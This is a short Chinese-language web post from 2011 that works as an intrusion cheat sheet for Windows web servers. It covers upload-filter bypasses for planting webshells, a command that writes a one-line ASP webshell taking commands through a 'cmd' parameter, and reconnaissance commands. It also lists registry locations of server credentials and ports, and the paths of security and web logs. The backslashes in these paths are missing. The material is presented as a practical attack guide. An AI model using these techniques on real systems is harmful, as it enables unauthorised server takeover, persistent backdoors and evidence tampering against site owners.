入侵渗透中的一些技巧和思路

发布时间：2011-04-04 11:54:26作者：知识屋

上传漏洞拿shell：

入侵渗透中用到的一些技巧和思路
1.直接上传asp.asa.jsp.cer.php.aspx.htr.cdx....之类的马，拿到shell.
2.就是在上传时在后缀后面加空格或者加几点，也许也会有惊奇的发现。例：*.asp ,*.asp..。
3.利用双重扩展名上传例如：*.jpg.asa格式(也可以配上第二点一起利用)。
4.gif文件头欺骗
5.同名重复上传也很OK。：

入侵渗透中用到的命令，语法：

入侵渗透中用到的一些技巧和思路

set,systeminfo,ipconfig,ping,利用这些命令可以收到比较多的系统信息
tasklist /svc 查看服务对应的pid
netstat -ano，netstat -abnv
fsutil.exe fsinfo drives 列出全部盘符
dir d:*conn*.* /s 找数据库连接文件
telnet 218.25.88.234 3389 对外部是否开放了这个端口
echo ^<%execute(request("cmd"))%^> >>e:kX.asp 写一句话到e:k目录,密码为cmd.
type d:wwwrootwebk6.asp >d:wwwroot123a.asp 传送d:wwwrootweb下的k6.asp到d:wwwroot123重命名为a.asp

入侵渗透中用到的一些技巧和思路
注册表敏感信息：

入侵渗透中用到的一些技巧和思路
HKEY_LOCAL_MACHINESOFTWAREMySQL AB mysql 注册表位置
HKEY_LOCAL_MACHINESOFTWAREHZHOSTCONFIG 华众主机位置
HKEY_LOCAL_MACHINESOFTWAREcat softserv-u serv-u 位置
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcpPortNamber 3389端口
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesTcpipParameters 1433端口
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesMSFtpsvcParametersVirtual Roots 服务器ftp路径

入侵渗透中用到的一些技巧和思路
服务器日志文件物理路径：

入侵渗透中用到的一些技巧和思路
安全日志文件：%systemroot%system32config SecEvent.EVT
系统日志文件：%systemroot%system32config SysEvent.EVT
应用程序日志文件：%systemroot%system32config AppEvent.EVT
FTP连接日志和HTTPD事务日志：systemroot% system32LogFiles，下面还有子文件夹，分别对应该FTP和Web服务的日志，其对应的后缀名为.Log。
诺顿杀毒日志：C:Documents and SettingsAll UsersApplication DataSymantec

（免责声明：文章内容如涉及作品内容、版权和其它问题，请及时与我们联系，我们将在第一时间删除内容，文章内容仅供参考）